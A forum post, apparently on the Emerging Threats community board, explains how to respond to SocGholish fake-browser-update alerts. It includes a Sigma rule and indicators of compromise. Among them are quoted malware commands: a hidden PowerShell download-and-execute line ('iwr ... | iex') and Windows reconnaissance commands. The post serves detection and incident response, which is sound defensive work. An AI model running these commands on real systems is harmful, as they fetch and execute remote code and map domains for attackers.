ET SocGholish Rules Response Guidance

dumiller · February 28, 2023, 7:01pm

What is SocGholish?

SocGholish is an opportunistic threat that uses malicious JavaScript injects in legitimate websites to serve a Fake Browser Update that downloads a .js file, usually compressed in a .zip file. You can learn more in the Threat Insight blogs at part 1 and part 2 or Proofpoint Researcher Andrew Northern’s Webinar.

What detections do we have?

In our tracking of SocGholish we have made Stage 2 (Shadowed) Domains as well as the Stage 3 Command-and-Control (CnC) domains available as a part of our ET Open Ruleset. They can be identified by names of “ET MALWARE SocGholish Domain in DNS Lookup ()” and “ET MALWARE SocGholish CnC Domain in DNS Lookup ()”. These domains are added as we identify them and are not used in non-SocGholish traffic, so they should not False Positive. We also remove domains that are no longer in use within a week or two to ensure that all alerts are current.

How to respond to alerts?

I wanted to briefly share some insights to investigate the activity when you get a SocGholish alert. The response and severity vary depending on which alert you see.

ET MALWARE SocGholish Domain in DNS Lookup:

This alert is triggered by a DNS request for a Shadowed Stage 2 domain and means that an end user visited a website that was infected with a SocGholish inject and started the chain of JavaScript requests. We have seen a few different HTTP requests occur with this traffic (see in IOCs below) that eventually may serve the fake update payload in a plain .js file or an archived .js file.

These alerts do not indicate an active infection but are worth investigating to verify that the Fake Update payload was not downloaded and executed. As we only do a daily rule release, there is a short delay between a new Command and Control Domain being identified and it being in the open ruleset. The “Stage 2” domains are usually created with Domain Shadowing, so may be related to clean domains, but themselves are malicious. There are usually between 8 and 12 “Stage 2” domain active at any time and they last anywhere from 1 to 3 months.

Next steps for investigation would be to identify the host that made the DNS requests and see if there was a .js or .zip file downloaded and executed.

ET MALWARE SocGholish CnC Domain in DNS Lookup:

If you receive a SocGholish CnC Domain alert, it means that the .js payload was executed by an end user. The .js payload will make a variety of HTTP POST requests (see URIs in IOCs below). The payload has been seen dropping NetSupport RAT in some cases and in others dropping Cobalt Strike. It is important to react quickly as there have been reports of a short dwell time (time between initial infection and follow on malware, which includes ransomware) with SocGholish infections. The CnC domains change anywhere from once every two weeks to every couple of days.

Please see our March 2025 update

On an infected host you will see a variety of commands run with a parent process of wscript.exe (shown in IOCs below). Make sure to identify the host and isolate to prevent the spread of the infection.

IOCs:

Sigma Rule:

title: Potential SocGholish C2 DNS Query 
status: experimental 
description: Detects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic 
references: 
    - https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations 
    - https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations 
    - https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update 
author: Dusty Miller 
date: 2023/02/23 
tags: 
    - attack.command_and_control 
    - attack.t1219 
logsource: 
    product: windows 
    category: dns_query 
detection: 
    selection: 
        Image|endswith: '\wscript.exe' 
        QueryName|re: '[a-f0-9]{4,8}\.(?:[a-z0-9\-]+\.){2}[a-z0-9\-]+' 
    condition: selection 
falsepositives: 
     - Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk) 
level: high

Example Commands:

Wscript.exe spawning multiple child processes 
Cmd.exe /C “whoami /all” 
Cmd.exe /C “nltest /dclist:” 
Wscript.exe running “powershell -w h -c "iwr -usebasicparsing <url> |iex”

Stage 2 URIs:

/report?r=<base64 string> (Not used anymore)
/<44- or 64-character base64 string> (this can include “/” that may look like a path but are a part of the domain)

Examples:

/o4jK/HeFKNPaSRfGRMB+JdpCQ9UhgaLQ6ToDPNeX8sabbIQ0GUppxan8BXkxVsyC
/eRie8yGWBG01BQ81FVuI8UOGsCrLrEQdV7IYjT2Nrgk= 
/IunlJOBDNMoF+YnVUcBLNH4OmB92afePsA3ZMgtNlD60NrhHuF7xZ4TU6B612mgx 
/Ly4OWiyZlDTP+WctDx7UJdcEIhDp9xVEvqtVXECC/Vk=

Stage 3 (C2) URIs:

/subscribeEvent 
/shareView

samjenk · May 30, 2023, 1:27pm

This is a great summary of how to interpret these rules, @dumiller. I appreciate this post!

xiaofan · March 12, 2025, 8:14am

there should be more post of explaining the ET rules

Topic	Replies	Views
Changes to ET SocGholish Rule Names to Reflect TA569 and TA2726/2727 Activity Tutorials, Tips & Tricks socgholish , injectors , ta569 , ta2727 , ta2726	113	March 13, 2025
Ruleset Update Summary - 2024/09/19 - v10699 Ruleset Updates	65	September 19, 2024
Ruleset Update Summary - 2023/06/08 - v10343 Ruleset Updates	240	June 8, 2023
Ruleset Update Summary - 2023/05/26 - v10333 Ruleset Updates	409	May 26, 2023
Ruleset Update Summary - 2022/12/22 - v10203 Ruleset Updates	201	December 22, 2022